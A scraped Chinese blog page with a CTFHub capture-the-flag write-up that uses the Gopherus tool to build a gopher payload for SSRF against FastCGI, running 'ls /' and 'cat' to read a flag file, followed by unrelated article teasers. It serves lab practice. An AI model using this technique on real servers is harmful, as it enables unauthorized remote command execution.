CTFHUB-SSRF-FastCGI协议

article2024/11/23 23:32:43/文章来源:https://blog.csdn.net/weixin_68416970/article/details/140098801

本题需要用到：

在线编码网址：https://icyberchef.com/

gopherus工具：https://mp.csdn.net/mp_blog/creation/editor/139440201

开启题目，页面空白

使用gopherus工具，进入到gopherus工具目录

./gopherus.py --exploit fastcgi
/var/www/html/index.php
ls /

得到了

放进url里并没有什么用，再对它进行一次url编码

放进url

看到了flag的文件名，直接读取它

跟之前的步骤一样，只不过这次的命令是cat

/var/www/html/index.php
cat /flag_fbed5a4460ae89f3b620fb43c404496b

得到了，再对它进行编码，得到了编码后的

放进url访问，得到了flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/763665.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

【软件测试】性能测试 JMeter脚本开发！

一、JMeter脚本开发实战实例：查询一个城市的天气预报使用抓包工具观察请求所产生的请求列表，筛选最核心API。 A、获取城市代码 http://toy1.weather.com.cn/search?cityname西安 B、获取天气 http://www.weather.com.cn/weather1d/101110101.sht…

【学习笔记】Redis学习笔记——第5章跳跃表

第5章跳跃表有序集合，ZSet关键组成部分，时间复杂度媲美平衡树，且实现简单。 5.1 跳跃表的实现可以简单理解为每个节点会有一些指向后面跨越N个节点的指针，比如说Node1不仅有指向Node2的指针，还可以有Node5的&…

p54-56 k8s核心实战 service服务发现 Service:将一组 Pods 公开为网络服务的抽象方法。 #暴露Deploy,暴露deploy会出现在svc kubectl expose deployment my-dep --port8000 --target-port80#使用标签检索Pod kubectl get pod -l appmy-depapiVersion: v1 kind: Service metad…

使用Python实现钉钉Stream模式服务开发及内部程序通信

1、什么是Stream模式 Stream 模式是钉钉开放平台提供的一种集成方式，它可以监听机器人回调、事件订阅回调和注册卡片回调。使用 Stream 模式接入，钉钉开放平台将通过 Websocket 连接与应用程序通讯，Stream 模式将极大降低接入门槛和资源依赖…

Android- Framework 非Root权限实现修改hosts

一、背景修改system/etc/hosts，需要具备root权限，而且remount后，才能修改，本文介绍非root状态下修改system/etc/hosts方案。环境：高通 Android 13 二、方案非root，system/etc/hosts只有只读权限&…

工业智能网关的功能特点有哪些？工业智能网关在工业企业的应用-天拓四方

随着工业4.0时代的到来，数字化转型已成为工业企业提升竞争力、实现可持续发展的必经之路。在这一过程中，工业智能网关以其强大的连接、数据处理和安全防护能力，成为推动工业数字化转型的关键力量。本文将深入探讨工业智能网关的功能特点、应用…

基于Java中的SSM框架实现大学生就业预测系统项目【项目源码+论文说明】计算机毕业设计

基于Java中的SSM框架实现大学生就业预测系统演示摘要科技不断飞速发展，人类文明走向一个又一个的高峰。在科技进步的浪潮中，计算机技术得到了巨大的发展，随着技术的完善，生产成本的降低，计算机走进千家万户。计算机…

API-Window对象

学习目标： 掌握Window对象学习内容： BOM（浏览器对象模型）定时器-延时函数JS执行机制location对象navigation对象history对象 BOM（浏览器对象模型）： BOM是浏览器对象模型。 window对象是一个全…

Outlook 2021 LTSC for Mac v16.86.2中文正式版

Outlook 2021是微软公司推出的一款电子邮件、日历、联系人管理器和任务管理器应用程序。它是Microsoft 365套件的一部分，适用于Windows、macOS以及iOS和Android移动设备。Outlook 2021在界面设计、功能性和性能方面进行了多项改进，以帮助用户更有效地管理…

（超详细）数据结构——“队列”的深度解析

目录前言： 1.队列的概念 2.队列的实现 3.代码实现队列 3.1 队列的初始化 3.2 插入 3.3 删除 3.4 队列的队头，队尾和大小 3.5 判空 3.6 销毁 3.7 测试前言： 队列与栈都是线性表，它们的结构也非常类似&#…

备份SQL Server数据库并还原到另一台服务器

我可以将SQL Server数据库备份到另一台服务器吗？ 有时您可能希望将 SQL数据库从一台服务器复制到另一台服务器，或者将计算机复制到计算机。可能的场景包括测试、检查一致性、从崩溃的机器恢复数据库、在不同的机器上处理同一个项目等。是的&#xff0c…

DevExpress WinForms磁贴导航面板 TileBar组件，让桌面应用触摸更友好！

界面控件DevExpress WinFormsTileNavPane被设计为位于应用程序窗口的顶部(就像Ribbon一样)，可以被认为是Windows桌面应用程序中传统导航元素的触摸友好版本。 P.S：DevExpress WinForms拥有180组件和UI库，能为Windows Forms平台创建具有影响力…

使用高斯混合模型识别餐厅热点

使用 GMM 识别加拿大多伦多的直观餐厅集群（附 Python 代码） 聚类算法（例如 GMM）是一种有用的工具，可帮助识别数据中的模式。它们使我们能够识别数据集中的子组，从而提高你的理解或增强预测模型。在本文中&a…

LVM核心概念

1. LVM简介 LVM是逻辑盘卷管理（Logical Volume Manager）的简称，它是Linux环境下对磁盘分区进行管理的一种机制，LVM是建立在硬盘和分区之上的一个逻辑层，来提高磁盘分区管理的灵活性。优点： 可以灵活分配…

postgresql命令行基本操作指令

文章目录前言一、psql下载安装二、未配置环境变量连接方式1.可视化工具2. 命令行操作连接到postgreSQL 三、配置环境变量四、常用操作指令1. 连接数据库2. 查看数据库3. 创建数据库4. 切换数据库5. 创建数据库表结构6. 查看表结构7. 查看所有的表8. 插入数据9. 查看数据10. 更…